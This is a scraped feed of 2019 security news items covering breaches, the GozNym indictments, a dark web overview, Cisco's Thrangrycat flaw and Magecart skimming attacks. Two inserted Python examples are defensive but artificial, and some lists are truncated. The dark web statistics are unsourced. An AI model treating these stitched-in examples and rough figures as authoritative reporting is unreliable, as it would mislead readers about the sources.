Publicly traded companies suffering the worst data breaches averaged a 7.5 percent decrease in stock price, a Bitglass report reveals. Bitglass researched the three largest data breaches of publicly traded companies from each of the last three years in order to uncover cybersecurity trends and demonstrate the extensive damage that can be done by improper security. Among the incidents detailed in the Kings of the Monster Breaches report are the Marriott breach of 2018, the … More

The post The largest breaches over the past three years have caused massive and irreparable damage appeared first on Help Net Security.

Half of companies missed GDPR deadline, 70% admit systems won’t scale

Even if given two years notice to achieve GDPR compliance, only half of companies self-reported as compliant by May 25, 2018, a DataGrail survey reveals. “The Age of Privacy: The Cost of Continuous Compliance” report benchmarks the operational impact of the European General Data Protection Regulation (GDPR) and the California Consumer Privacy Act (CCPA), as well as sharing insights into lessons learned and attitudes toward privacy regulations. DataGrail surveyed more than 300 U.S. privacy management … More

The post Half of companies missed GDPR deadline, 70% admit systems won’t scale appeared first on Help Net Security.

Analysis of device data shines a light on cybersecurity risks in healthcare

The convergence of IT, IoT and OT makes it more difficult for the healthcare industry to manage a wide array of hard-to-control network security risks. IoT and OT devices are rapidly increasing in numbers, but traditional IT still represents the most vulnerable attack surface, according to the Forescout Technologies report. Forescout Technologies announced insights from 75 real healthcare deployments with more than 10,000 virtual local area networks (VLANs) and 1.5 million devices contained within the … More

The post Analysis of device data shines a light on cybersecurity risks in healthcare appeared first on Help Net Security.

Data will be processed by edge computing in 59% of IoT deployments by 2025

Edge computing is on the rise in IoT deployments and is expected to show solid growth over the coming years, according to Strategy Analytics most recent report. Strategy Analytics believes that data will be processed (in some form) by edge computing in 59% of IoT deployments by 2025. The driving forces in this assumption are the key benefits derived from edge computing, namely more efficient use of the network, security and response time. Currently, Strategy … More

The post Data will be processed by edge computing in 59% of IoT deployments by 2025 appeared first on Help Net Security.

Entrust Datacard unveils new cloud-based solution hosted in a PCI-CP-certified data center

Entrust Datacard launched a new cloud-based solution that enables banks to instantly personalize and activate customer payment cards. Whether buying coffee or shopping online, consumers expect instant service and fast delivery. Getting a new debit or credit card, or replacing a lost or stolen card is no different. Secure instant issuance allows banks to issue customers a permanent, personalized payment card on demand. They have access to their card, funds and services, in just … More

The post Entrust Datacard unveils new cloud-based solution hosted in a PCI-CP-certified data center appeared first on Help Net Security.

ASG-Enterprise Orchestrator enhancements to enable end-to-end value stream control

ASG Technologies, a trusted provider of proven solutions for information access, management and control for the world’s top enterprises, unveiled ASG-Enterprise Orchestrator, which delivers cross-technology stack orchestration of critical enterprise value streams. Spanning capabilities from mainframe to cloud, ASG-Enterprise Orchestrator offers workload automation, value stream visibility and DevOps tool-chain coordination required to optimize value streams. It delivers control from a single view and choreographs work across a broad spectrum of technology stacks and software packages. … More

The post ASG-Enterprise Orchestrator enhancements to enable end-to-end value stream control appeared first on Help Net Security.

Tata Communications and Cisco to offer enterprises a secure multi-cloud native hybrid network

The leading global digital infrastructure provider Tata Communications and Cisco have extended their partnership to enable enterprises to transform their legacy network to a customised and secure multi-cloud native hybrid network. The combination of Tata Communications’ IZO cloud enablement platform and Cisco SD-WAN is a fully-managed, global solution that gives businesses greater control over their digital infrastructure, the ability to securely connect any user to any application location, and provide the assurance of application performance … More

The post Tata Communications and Cisco to offer enterprises a secure multi-cloud native hybrid network appeared first on Help Net Security.

Laptop Running Six Most Dangerous Malware up for Auction

This is news! A laptop containing six of the most dangerous malware strains created to date is up for auction.

A Samsung NC10-14GB 10.2-Inch Blue Netbook, which contains six such malware strains which together have caused damages worth $95B over the years, has been put up for auction. This laptop has in fact been isolated and airgapped so as to prevent the spread of the malware that it contains. (Well, we know that if you are an expert, you might be cynical about the effectiveness of airgapping; but technically speaking, it’s supposed to help curb the spread of malware!).

It’s illegal to sell malware for operational purposes in the U.S. The seller of the malware-packed laptop, as per reports, has devised a way to get around this issue by calling it art. This laptop, which runs on Windows XP SP3, is now called ‘The Persistence of Chaos’.

A Forbes report dated May 15, 2019, says, “The singular laptop is an air-gapped Samsung NC10-14GB 10.2-Inch Blue Netbook (2008) running Windows XP SP3 and loaded with the malware and restart script. It also comes with a power cord, just in case the 11-year-old battery isn’t still holding a viable charge.” The report further adds, “It’s currently sitting on a white cube in a room somewhere in New York City and is being sold under the guise of art as “The Persistence of Chaos”. It’s certainly subversive and skirts the legalities of selling malware (it’s illegal to sell for operational purposes), but hey, anarchy is entertaining.”

The infected laptop is a creation of performance artist Guo O Dong in collaboration with cybersecurity company Deep Instinct. Curtis Silver, who has authored the Forbes report, has quoted Guo O Dong as telling him via email, “I created The Persistence of Chaos because I wanted to see how the world responds to and values the impact of malware.”

The six strains of malware that the laptop contains are

WannaCry – The ransomware that spread all across the world and made a devastating impact on over 200,000 computers across over 150 countries.

Mydoom – The fastest-spreading email worm to date, Mydoom was first seen in January 2004 and worked mainly by sending junk email through infected computers while appearing as a transmission error.

Sobig – First detected to be infecting computer systems in August 2003, this malware, which is a worm and a trojan, is the second fastest spreading worm as of 2018. It deactivated itself in September 2003.

BlackEnergy – The malware that was first seen in 2007 and worked by generating bots for executing DDoS attacks, distributed via email spam. At a later stage of its evolution, it would drop an infected DLL component directly into the local application data folder.

ILOVEYOU – This malware, which spread through an email attachment ‘LOVE-LETTER-FOR-YOU.txt.vbs’, was sent from an infected person to the people in their contact list. Once the attachment is opened, a script starts that overwrites random types of files: Office files, audio files, image files, etc. Seen since May 2000.

DarkTequila – This malware, which has been active since 2013 and seen impacting systems in Latin America, spreads through spear phishing and infected USB drives. Hackers use DarkTequila to steal corporate data, bank credentials, and personal data as well.

Curtis Silver observes in his Forbes report, “On a base level the goal if we believe light grey text on a white background, is to sell this malware infused laptop under the blanket of art for academic purposes. On a deeper level, it’s a statement of social anarchy, of controlled chaos and an exposé of how fragile our machine-connected lives really are.”

This is a very relevant observation because news relating to this laptop (if it has all the malware that it claims to have), is in all respects, a worrying thing.


The post Laptop Running Six Most Dangerous Malware up for Auction appeared first on .

Onapsis appoints Gerhard Eschelbeck to board of directors

Onapsis, the global leader in business application cyber resilience, announced the appointment of former Google Vice President Security & Privacy Engineering (CISO) Gerhard Eschelbeck to the company’s board of directors. Eschelbeck brings strong experience in transforming traditional security solutions and delivering them through the cloud, which will help Onapsis guide customers to the cloud with confidence. A proven information technology executive with strong operational and strategic experience, Eschelbeck has launched innovative and successful companies and … More

The post Onapsis appoints Gerhard Eschelbeck to board of directors appeared first on Help Net Security.

Feds Target $100M ‘GozNym’ Cybercrime Network

Law enforcement agencies in the United States and Europe today unsealed charges against 11 alleged members of the GozNym malware network, an international cybercriminal syndicate suspected of stealing $100 million from more than 41,000 victims with the help of a stealthy banking trojan by the same name.

The locations of alleged GozNym cybercrime group members. Source: DOJ

The indictments unsealed in a Pennsylvania court this week stem from a slew of cyber heists carried out between October 2015 and December 2016. They’re also related to the 2016 arrest of Krasimir Nikolov, a 47-year-old Bulgarian man who was extradited to the United States to face charges for allegedly cashing out bank accounts that were compromised by the GozNym malware.

Prosecutors say Nikolov, a.k.a. “pablopicasso,” “salvadordali,” and “karlo,” was a key player in the GozNym crime group who used stolen online banking credentials captured by GozNym malware to access victims’ online bank accounts and attempt to steal their money through electronic funds transfers into bank accounts controlled by fellow conspirators.

According to the indictment, the GozNym network exemplified the concept of ‘cybercrime as a service,’ in that the defendants advertised their specialized technical skills and services on underground, Russian-language, online criminal forums. The malware was dubbed GozNym because it combines the stealth of a previous malware strain called Nymaim with the capabilities of the powerful Gozi banking trojan.

The feds say the ringleader of the group was Alexander Konovolov, 35, of Tbilisi, Georgia, who controlled more than 41,000 victim computers infected with GozNym and recruited various other members of the cybercrime team.

Vladimir Gorin, a.k.a “Voland,” “mrv,” and “riddler,” of Orenburg, Russia allegedly was a malware developer who oversaw the creation, development, management, and leasing of GozNym.

The indictment alleges 32-year-old Eduard Malancini, a.k.a. “JekaProf” and “procryptgroup” from Moldova, specialized in “crypting” or obfuscating the GozNym malware to evade detection by antivirus software.

Four other men named in the indictment were accused of recruiting and managing “money mules,” willing or unwitting people who can be used to receive stolen funds on behalf of the criminal syndicate. One of those alleged mule managers — Farkhad Rauf Ogly Manokhim (a.k.a. “frusa”) of Volgograd, Russia was arrested in 2017 in Sri Lanka on an international warrant from the United States, but escaped and fled back to Russia while on bail awaiting extradition.

Also charged was 28-year-old Muscovite Konstantin Volchkov, a.k.a. “elvi,” who allegedly provided the spamming service used to disseminate malicious links that tried to foist GozNym on recipients who clicked.

The malicious links referenced in those spam emails were served via the Avalanche bulletproof hosting service, a distributed, cloud-hosting network that for seven years was rented out to hundreds of fraudsters for use in launching malware and phishing attacks. Avalanche was dismantled in Dec. 2016 by a similar international law enforcement action.

The alleged administrator of the Avalanche bulletproof network — 36-year-old Gennady Kapkanov from Poltava, Ukraine — has eluded justice in prior scrapes with the law: During the Avalanche takedown in Dec. 2016, Kapkanov fired an assault rifle at Ukrainian police who were trying to raid his apartment.

After that incident, Ukrainian police arrested Kapkanov and booked him on cybercrime charges. But a judge later ordered him to be released, saying the prosecution had failed to file the proper charges. The Justice Department says Kapkanov is now facing prosecution in Ukraine for his role in providing bulletproof hosting services to the GozNym criminal network.

The five Russian nationals charged in the case remain at large. The FBI has released a “wanted” poster with photos and more details about them. The Justice Department says it is working with authorities in Georgia, Ukraine and Moldova to build prosecutions against the defendants in those countries.

Nikolov entered a guilty plea in federal court in Pittsburgh on charges relating to his participation in the GozNym conspiracy on April 10, 2019. He is scheduled to be sentenced on Aug. 30, 2019.

It’s good to see this crime network being torn apart, even if many of its key members have yet to be apprehended. These guys caused painful losses for many companies — mostly small businesses — that got infected with their malware. Their activities and structure are remarkably similar to that of the “Jabberzeus” crime gang in Ukraine that siphoned $70 million — out of an attempted $220 million — from hundreds of U.S.-based small to mid-sized businesses several years ago.

The financial losses brought about by that gang’s string of cyberheists — or at least the few dozen heists documented in my series Target: Small Business — often caused victim companies to lay off employees, and in some cases go out of business entirely.

A copy of the GozNym indictment is here (PDF).

Past, present, and future of the Dark Web

What is the difference between the Deep Web and the Dark Web? Some considerations on the past, present, and future of the Dark Web.

These are intense days for the Dark Web. Operations conducted by law enforcement agencies have led to the arrest of many individuals and to the closure of the most popular black marketplaces, many of which had survived for years.

The operators behind the principal black markets made a lot of money; think of the managers of the Wall Street Market and Valhalla, recently seized by the feds. These were historic points of aggregation where it was possible to buy drugs, weapons, and any kind of hacking tool.

The icing on the cake was a US study which found that the size of the Dark Web is significantly smaller than previously thought. This is no news to the experts who study the dark web and its evolution.

Unfortunately there is too much confusion between the terms deep web and dark web, and many YouTube channels publish videos with wrong information. Misinterpretation, superficiality and sometimes simple profit are the root causes of the confusion. This misinformation is extremely dangerous for kids, the first consumers of the videos published on the principal social media platforms. Some videos claim that it is very simple to buy drugs securely or explain how to hack a website. By describing these phenomena, some journalists have been labeled “experts on the dark web”.

The Dark Web is just a portion of the Deep Web; accessing it is quite simple and doesn’t require any specific technical skill. It is very easy to access the Tor network or to browse content on other anonymizing networks like I2P.

I started this research in September 2016, when I started writing my book, “The Prison of the Humanity – from the deep web to 4.0 the new digital prisons”.


An iceberg has always been used as a visual representation of the Internet. The visible peak, the smallest part of the iceberg, is what many have mistakenly associated with the clear web: the part reachable by search engines.

Even a child could easily wonder: how can the billions of sites visible to internet users represent only 5% of the internet itself?

Exactly, how?

The Deep Web is composed of the content of the web that is not indexed by search engines. Imagine the site of a provider that offers voice or connectivity services to millions of people, families and companies: its files are not indexable by search engines. Think of a banking site whose millions of account holders keep years of transaction, deposit and investment history, which is obviously not accessible to the entire web population.

Let’s also include all the information produced by IoT devices connected online that cannot be accessed for obvious reasons.

Now you can have an idea of the size of the Deep Web.


What is the Dark Web? It is a non-indexed subset of the Deep Web. Accessible through Tor and other software, its size is incalculable if we rely on imagination alone. In fact, there could be many .onion sites (the domain extension used inside the Tor network) that are not listed by the Hidden Wiki, a sort of Wikipedia of onion links. Furthermore, each website can have sublevels that could extend indefinitely.

But here we are talking about legends. Let’s get into the merits of my research, which is based on the facts and experience of three years of journalistic navigation in the Dark Web, during which I have not only browsed dozens of directories but visited at least 100,000 sites.

My research is based on 100,000 sites that I have personally visited and that can be easily classified into very few categories, which I will explain with brief descriptions:


Information:

The spirit of the Dark Web includes, precisely, freedom of expression, with portals that give “uncomfortable” or “alternative” news in countries where there is censorship. There are many sites in multiple languages that refer to ideological and collective movements, mostly of anarchist derivation, but there are also movements that promote the defense of online privacy. So there is a lot of counter-information; the most obvious example, which I always bring up, is the Bible translated into the languages of the countries where it is strictly prohibited.

Black Markets:

They are the heart of the Dark Web in economic terms. Needless to say, it is impossible to count them or verify their reliability, but they are certainly points of aggregation for several million users and for unscrupulous sellers offering drugs, weapons, prescription medicines, bank credentials and personal data of unsuspecting users, steroids and hacking guides.

Empty or non-functional web pages:

Empty pages and typical 404 error pages that pad the lists of .onion domains in the directories.


Scam:

There are many sites that promise the same services as the black markets, including hitman services, hacking services and money laundering services… but they are only fronts operated by scammers.

Directories – Search Engines

There are many directories that offer the same links, and Hidden Wiki services that offer a guide to the principal links in the Dark Web, but clearly there is only one original Hidden Wiki, which not only lists the links to the sites but also provides an “obscure and forbidden” encyclopedia service similar to the better known Wikipedia. Search engines similar to Google are also frequent, but they do not always find the results users hope for.

Child pornography – pornography – violence on animals – gore

There are many pornographic sites on the clear web, but pornography in the dark web takes on gruesome tones. Violence, child abuse, snuff movies and extreme sex are very common. The sites that belong to these categories are divided into different types: chat rooms, traditional websites or service containers. The chats are usually open and there is a remarkable exchange of multimedia files for free. Then there are the forums that need registration, they offer audio/video content or images, and also provide suggestions on how to kill people or how to eat them in ritual cannibalism. Furthermore, there are many child pornography sites on the dark web that point to the largest online sharing platforms, such as Satoshi box or Megaupload, where it is possible to pay to download packages of illegal content.

Websites – Forums

They are normal websites that deal with different topics, including forums that are meeting points for users who discuss legal and non-legal issues. There are many blogs, which for the most part deal with cybersecurity and the rights of the digital population in terms of consumer protection and privacy.


Honeypots:

Many sites belonging to the above categories are, in fact, traps set up by law enforcement agencies in an attempt to identify criminals. The dark web is full of honeypots.


Let’s conclude with some statistics on the composition of the Dark Web:

  • Not Working: 45%
  • Scam: 44%
  • Websites – Forums: 6%
  • Child pornography – Gore: 4%
  • Directories – search engines: 0.5%
  • Information: 0.3%
  • Black Markets: 0.2%

At this time it is not possible to determine the exact number of black markets; in any case, it is really limited. Terrorism is an irrelevant phenomenon in terms of propaganda. It is also impossible to determine the diffusion of honeypots.

The real question is not how big the Dark Web is, but what will happen after the operations conducted by law enforcement.

Who will be its users? Will Black Markets still exist?

Or is the Dark Web itself a honeypot for criminals, anarchists, terrorists and pedophiles?

These doubts are legitimate, given the military origins of the most popular anonymizing network.

About the Author: Livio Varriale

Pierluigi Paganini

(SecurityAffairs – Dark Web, crime)

The post Past, present, and future of the Dark Web appeared first on Security Affairs.

Google ‘0Day In the Wild’ project tracks zero-days exploited in the Wild

White hat hackers at Google Project Zero are tracking cyber attacks that exploit zero-days before the vendor releases security fixes.

Experts at Google Project Zero are tracking cyber attacks exploiting zero-days as part of a project named 0Day ‘In the Wild.’

“Today, we’re sharing our tracking spreadsheet for publicly known cases of detected zero-day exploits, in the hope that this can be a useful community resource:

Spreadsheet link: 0day “In the Wild”

This data is collected from a range of public sources. We include relevant links to third-party analysis and attribution, but we do this only for your information;” reads the blog post published by Google Project Zero.

The experts are monitoring zero-day vulnerabilities exploited by attackers before they become publicly disclosed or known to the vendor.


The project aims to track zero-days exploited in attacks, as documented in Project Zero’s research and in public sources.

The researchers collected the information in a shared spreadsheet that already includes over 100 vulnerabilities exploited in attacks since 2014.

The table includes the following information:

  • CVE ID;
  • Impacted Vendor and Product;
  • Description;
  • Discovery Date;
  • Date when the patch was released;
  • A link to the security advisory;
  • Claimed Attribution;

The list of vulnerabilities includes zero-days affecting products from major vendors, including Adobe, Apple, Cisco, Facebook, Google, Microsoft, and Oracle.

The attacks tracked by the experts were carried out by well-known threat actors, including APT3, APT28, APT31, APT37, DarkHotel, Equation Group, and Sandworm.

The project doesn’t cover zero-day exploits for software that reached end of life (EOL) by the time the flaw is discovered.

“The data described in the spreadsheet is nothing new, but we think that collecting it together in one place is useful.” concludes Google Project Zero.

By aggregating the data it is possible to extract useful information such as:

  • On average, a new “in the wild” exploit is discovered every 17 days (but in practice these often clump together in exploit chains that are all discovered on the same date);
  • Across all vendors, it takes 15 days on average to patch a vulnerability that is being used in active attacks;
  • A detailed technical analysis on the root-cause of the vulnerability is published for 86% of listed CVEs;
  • Memory corruption issues are the root-cause of 68% of listed CVEs
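As an added example (not code from Project Zero or from the article), here is how figures of this kind can be derived from a table with the spreadsheet’s columns. The rows, CVE IDs and the extra root_cause column are constructed placeholders, since the page lists no individual entries; the discovery-interval function also shows the clumping caveat by counting same-day CVEs as one event.

```python
import csv
import io
from dataclasses import dataclass
from datetime import date
from typing import Optional

# Constructed sample in the shape of the spreadsheet's columns. CVE IDs, vendors,
# dates and attributions are placeholders, not real entries. The root_cause
# column is an assumption added here so that the root-cause figures quoted in
# the article can be reproduced; the page itself lists only the other columns.
SAMPLE_CSV = """\
cve,vendor,product,description,discovered,patched,advisory,attribution,root_cause
CVE-EXAMPLE-0001,VendorA,Browser,use-after-free in the renderer,2018-01-10,2018-01-24,https://advisory.example/a1,GroupX,memory_corruption
CVE-EXAMPLE-0002,VendorA,Browser,sandbox escape from the same chain,2018-01-10,2018-01-24,https://advisory.example/a2,GroupX,memory_corruption
CVE-EXAMPLE-0003,VendorB,Office suite,logic flaw in macro handling,2018-02-15,2018-03-02,https://advisory.example/b1,,logic
CVE-EXAMPLE-0004,VendorC,Kernel,out-of-bounds write in a driver,2018-04-01,2018-04-25,https://advisory.example/c1,GroupY,memory_corruption
CVE-EXAMPLE-0005,VendorD,VPN appliance,still under analysis,2018-05-20,,,,
"""


@dataclass
class Record:
    cve: str
    vendor: str
    product: str
    discovered: date
    patched: Optional[date]  # None when no patch date is recorded yet
    attribution: str         # empty when unattributed
    root_cause: str          # empty when no root-cause analysis is published


def _parse_date(text: str) -> Optional[date]:
    text = text.strip()
    return date.fromisoformat(text) if text else None


def load_records(csv_text: str) -> list[Record]:
    """Parse the table; a row must carry at least a CVE ID and a discovery date."""
    records = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        discovered = _parse_date(row["discovered"])
        if not row["cve"].strip() or discovered is None:
            raise ValueError(f"row without CVE ID or discovery date: {row!r}")
        records.append(Record(
            cve=row["cve"].strip(),
            vendor=row["vendor"].strip(),
            product=row["product"].strip(),
            discovered=discovered,
            patched=_parse_date(row["patched"]),
            attribution=row["attribution"].strip(),
            root_cause=row["root_cause"].strip(),
        ))
    return records


def discovery_interval_days(records: list[Record], per_chain: bool = True) -> float:
    """Mean days between discoveries over the period covered by the table.

    per_chain=True collapses CVEs discovered on the same day (one exploit chain)
    into a single event, the clumping caveat the article makes; per_chain=False
    counts every CVE and so yields the smaller per-CVE figure.
    """
    dates = sorted({r.discovered for r in records} if per_chain
                   else [r.discovered for r in records])
    if len(dates) < 2:
        return 0.0
    return (dates[-1] - dates[0]).days / (len(dates) - 1)


def mean_patch_days(records: list[Record]) -> float:
    """Mean days from discovery to patch, over the CVEs that have a patch date."""
    gaps = [(r.patched - r.discovered).days for r in records if r.patched is not None]
    return sum(gaps) / len(gaps) if gaps else 0.0


def root_cause_share(records: list[Record], cause: Optional[str] = None) -> float:
    """Share of all CVEs with any published root cause (cause=None) or a given one."""
    if not records:
        return 0.0
    hits = [r for r in records
            if r.root_cause and (cause is None or r.root_cause == cause)]
    return len(hits) / len(records)


def summarize(csv_text: str) -> dict:
    """The figures the article quotes, computed from the table."""
    records = load_records(csv_text)
    return {
        "cves": len(records),
        "discovery_interval_days": discovery_interval_days(records),
        "discovery_interval_days_per_cve": discovery_interval_days(records, per_chain=False),
        "mean_patch_days": mean_patch_days(records),
        "root_cause_published": root_cause_share(records),
        "memory_corruption": root_cause_share(records, "memory_corruption"),
    }


if __name__ == "__main__":
    for key, value in summarize(SAMPLE_CSV).items():
        print(f"{key}: {value:.2f}" if isinstance(value, float) else f"{key}: {value}")
```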

Pierluigi Paganini

(SecurityAffairs – zero-days, Google)

The post Google ‘0Day In the Wild’ project tracks zero-days exploited in the Wild appeared first on Security Affairs.

Profile of a Hacker: BiaSciLabs

Over the last twelve months our team has ramped up the number of public CMD+CTRL Cyber Range events we deliver at conferences, OWASP meetings, and Meetups. The feedback we have received has been great - people love learning how to hack in simulated, free form environments. In some cases the feedback we receive is so good that we need to share it with others in the form of profiles like Brandon Evans and Andre Gott.

More Attacks against Computer Automatic Update Systems

Last month, Kaspersky discovered that Asus's live update system was infected with malware, an operation it called Operation Shadowhammer. Now we learn that six other companies were targeted in the same operation.

As we mentioned before, ASUS was not the only company used by the attackers. Studying this case, our experts found other samples that used similar algorithms. As in the ASUS case, the samples were using digitally signed binaries from three other Asian vendors:

  • Electronics Extreme, authors of the zombie survival game called Infestation: Survivor Stories,
  • Innovative Extremist, a company that provides Web and IT infrastructure services but also used to work in game development,
  • Zepetto, the South Korean company that developed the video game Point Blank.

According to our researchers, the attackers either had access to the source code of the victims' projects or they injected malware at the time of project compilation, meaning they were in the networks of those companies. And this reminds us of an attack that we reported on a year ago: the CCleaner incident.

Also, our experts identified three additional victims: another video gaming company, a conglomerate holding company and a pharmaceutical company, all in South Korea. For now we cannot share additional details about those victims, because we are in the process of notifying them about the attack.

Me on supply chain security.

Critical Vulnerabilities in Cisco Products

A high-risk vulnerability in Cisco's secure boot process was disclosed earlier this week by Cisco and Red Balloon Security and is believed to have affected an estimated 100 or more devices.

The vulnerability (CVE-2019-1649) is “in the logic that handles access control to one of the hardware components in Cisco's proprietary Secure Boot implementation could allow an authenticated, local attacker to write a modified firmware image to the component. This vulnerability affects multiple Cisco products that support hardware-based Secure Boot functionality,” Cisco reported.

Additionally, Cisco reported that another vulnerability (CVE-2019-1862) in the “web-based user interface (Web UI) of Cisco IOS XE Software could allow an authenticated, remote attacker to execute commands on the underlying Linux shell of an affected device with root privileges.”

The vulnerability, called Thrangrycat, affects millions of Cisco devices (including routers, switches and firewalls) and exposes a large number of corporate and government networks to remote attacks, according to Red Balloon Security.

Cisco also noted in regard to the Secure Boot vulnerability that it will release software patches, but there are no workarounds to address the issue.

An attacker could exploit this to gain full and permanent access to those networks. It also can't be fixed with a software patch, so it will be difficult for affected organizations to fully mitigate the threats this poses, according to Red Balloon Security.

“This is a significant security weakness which potentially exposes a large number of corporate, government and even military networks to remote attacks,” said Dr. Ang Cui, founder and chief scientist of Red Balloon Security, in a press release. 

“We're talking about tens of millions of devices potentially affected by this vulnerability, many of them located inside of sensitive networks. These Cisco products form the backbone of secure communications for these organizations, and yet we can exploit them to permanently own their networks. Fixing this problem isn't easy, because to truly remediate it requires a physical replacement of the chip at the heart of the Trust Anchor system. A firmware patch will help to offset the risks, but it won't completely eliminate them. This is the real danger, and it will be difficult for companies, financial institutions and government agencies to properly address this problem.”

Forbes Site Up, Then Down Again after Magecart Attack

Forbes was reportedly back online but went down again at 3:30 pm UTC after reports that the site was hit with the Magecart card-skimming malware, according to security researcher Troy Mursch.

Mursch tweeted on May 15 that Forbes had been infected with the Magecart malware, adding that customers who made a purchase while the site was compromised likely had their credit card information stolen. In a later tweet, Mursch confirmed that the malware had been removed.

Hackers apparently injected obfuscated JavaScript, which could be linked to the ongoing supply chain attacks reported by Willem de Groot this week. Forbes is, according to The Register, a customer of Picreel, which has been the victim of a supply chain attack.

Mursch reportedly sent several emails in an attempt to alert Forbes to the Magecart infection and reported the problem to the domain owner, yet he has not heard back from Forbes, The Register said.

“Threat actors have used several methods of attacking websites. There’s a trend, though, towards attacking the payment page supply chain, which offers the most bang for their buck because third parties offer direct links to a larger number of customers, including high-profile companies that would otherwise be harder to compromise,” said Mike Bittner, associate director of digital security and operations, The Media Trust.

“These pages are soft targets for several reasons. They run third-party code supplied by vendors who operate on very tight – sometimes negative – profit margins and must scrutinize every expense. Such businesses too often fail to give security and privacy the priority they require. Second, third-party code executes outside the website owner’s infrastructure, making them hard, if not impossible, to monitor without the right tools and expertise. Third, in many publications, these payment pages do not fall under the website operators’ rev ops teams, who make pivotal decisions on security and privacy.

“The bottom line here is that publishers should carefully vet ALL their third parties for security and privacy and conduct frequent audits to ensure they have adequate security measures in place. Because every one of their third parties is likely not only vulnerable but under attack.”

Supply Chain Attack Hits Best of the Web Website

The website Best of the Web, whose purpose is to assure site visitors that their user data is safe and that the websites it lists value visitor privacy, has been hacked, according to security researcher Willem de Groot. The site is a directory of websites that receive a trust seal so visitors will know they are real businesses, but the site itself was injected with an information stealing malware.  

On May 13, the researcher tweeted that the Best of the Web seal was injected with two keyloggers and that more than 100 websites were still linked to the compromised seal.

Attackers reportedly injected obfuscated JavaScript code, and according to his latest tweet, de Groot confirmed that the attackers used open S3 buckets to inject form jackers. De Groot has identified several supply chain attacks that have impacted multiple companies (complete list at PublicWWW), including Picreel,,,, and

Best of the Web confirmed that it had been compromised, stating, "Earlier today, we were notified that the script we use to display trust seals that we host on Amazon’s content delivery network (CDN) was compromised. We took immediate action to remedy the situation and are in the process of informing those who were affected. We will be conducting a full security audit of our hosted accounts to ensure that this does not happen again.”

“In this latest supply chain attack, hackers went after the weakest link with the most impact to affect the greatest number of websites,” said Matan Or-El, CEO of Panorays. “It’s certainly ironic to hack a trust seal, and the message is clear: you cannot trust anything. This cyber incident underscores the importance of assessing the security of all third parties and continuously monitoring them, since their status can quickly change, as was the case here where the code was maliciously modified.”
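The Forbes and Best of the Web incidents above both came down to a third-party script (a Picreel tag, a CDN-hosted trust seal) changing underneath the sites that embedded it. As an added example, not code from either article or from any of the companies named, the following audits the external scripts on a checkout page against a host allowlist and pins a vendor script with Subresource Integrity; every host name, script body and the page itself are constructed samples.

```python
import base64
import hashlib
from dataclasses import dataclass
from html.parser import HTMLParser
from typing import Optional
from urllib.parse import urlparse

# Constructed sample data; every host name and script body is a placeholder.
FIRST_PARTY_HOSTS = {"static.shop.example"}
APPROVED_THIRD_PARTY_HOSTS = {"cdn.seal-vendor.example"}
SEAL_JS = b"document.getElementById('seal').src = '/seal.png';\n"
TAMPERED_SEAL_JS = SEAL_JS + b"/* bytes appended after the hash was pinned */\n"
SRI_ALGORITHMS = ("sha256", "sha384", "sha512")


def sri_hash(body: bytes, algo: str = "sha384") -> str:
    """Return the SRI token ('sha384-<base64 digest>') to pin for a script body."""
    if algo not in SRI_ALGORITHMS:
        raise ValueError(f"SRI supports only {SRI_ALGORITHMS}, not {algo!r}")
    digest = hashlib.new(algo, body).digest()
    return f"{algo}-{base64.b64encode(digest).decode('ascii')}"


def verify_integrity(body: bytes, integrity: str) -> bool:
    """Check a fetched body against an integrity attribute.

    Simplified browser behaviour: the attribute may hold several space-separated
    tokens; tokens with unknown algorithms are ignored and the body passes if it
    matches any remaining token.
    """
    for token in integrity.split():
        algo, _, _digest = token.partition("-")
        if algo in SRI_ALGORITHMS and sri_hash(body, algo) == token:
            return True
    return False


@dataclass
class ScriptTag:
    src: str
    integrity: Optional[str]


class ScriptTagParser(HTMLParser):
    """Collect every external <script src=...> together with its integrity attribute."""

    def __init__(self) -> None:
        super().__init__()
        self.scripts: list[ScriptTag] = []

    def handle_starttag(self, tag: str, attrs: list) -> None:
        if tag != "script":
            return
        a = dict(attrs)
        if a.get("src"):
            self.scripts.append(ScriptTag(a["src"], a.get("integrity")))


@dataclass
class Finding:
    src: str
    host: str
    issues: list  # empty when the include is acceptable


def audit_scripts(html: str, first_party: set, approved_third_party: set) -> list:
    """Flag third-party scripts from unapproved hosts or loaded without an SRI hash."""
    parser = ScriptTagParser()
    parser.feed(html)
    findings = []
    for s in parser.scripts:
        host = urlparse(s.src).hostname or "(same-origin)"  # relative src = first party
        issues = []
        if host != "(same-origin)" and host not in first_party:
            if host not in approved_third_party:
                issues.append("unapproved_host")
            if not s.integrity:
                issues.append("missing_integrity")
        findings.append(Finding(s.src, host, issues))
    return findings


def build_checkout_html() -> str:
    """Constructed checkout page: one first-party script, one pinned vendor seal,
    one unpinned widget from a host nobody approved."""
    return f"""<html><head>
<script src="https://static.shop.example/js/checkout.js"></script>
<script src="https://cdn.seal-vendor.example/seal.js"
        integrity="{sri_hash(SEAL_JS)}" crossorigin="anonymous"></script>
<script src="https://cdn.popup-vendor.example/widget.js"></script>
<script>var inlineConfig = 1;</script>
</head><body><form id="payment"></form></body></html>"""


if __name__ == "__main__":
    for f in audit_scripts(build_checkout_html(), FIRST_PARTY_HOSTS, APPROVED_THIRD_PARTY_HOSTS):
        print(f"{f.src}: {', '.join(f.issues) or 'ok'}")
    pinned = sri_hash(SEAL_JS)
    print("pinned seal.js verifies:", verify_integrity(SEAL_JS, pinned))
    print("modified seal.js verifies:", verify_integrity(TAMPERED_SEAL_JS, pinned))
```

SRI only works for scripts the vendor versions explicitly: a seal or tag that is updated in place behind the same URL will fail the check as soon as it changes, which is the point, but it means the vendor has to publish a new URL or hash with each release.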

7 Steps to Strengthen Your Cybersecurity Program Today

Managing a security program in today’s ever-changing cyber threat landscape is no small feat. Many administrators struggle with knowing where to even start. Cybersecurity programs must be continually evaluated and should evolve as cyber threats and company risk changes; however, these steps can guide you in the right direction to begin strengthening your security program today.

1.  Assess your current security program.

The best way to assess a security program is to first choose a framework best for your company. A good framework to follow is the NIST Cybersecurity Framework, which is a comprehensive guide to baseline security requirements and controls any company can implement to strengthen a security program. For companies of all sizes, implementing a security control or practice must be evaluated from a business standpoint to determine if the benefit to the business outweighs the cost of the security control. Following a framework for this evaluation will help you prioritize cybersecurity initiatives and give your company a clear roadmap for the way you want to develop a cybersecurity program.

2.  Identify what data you have and where it lives.

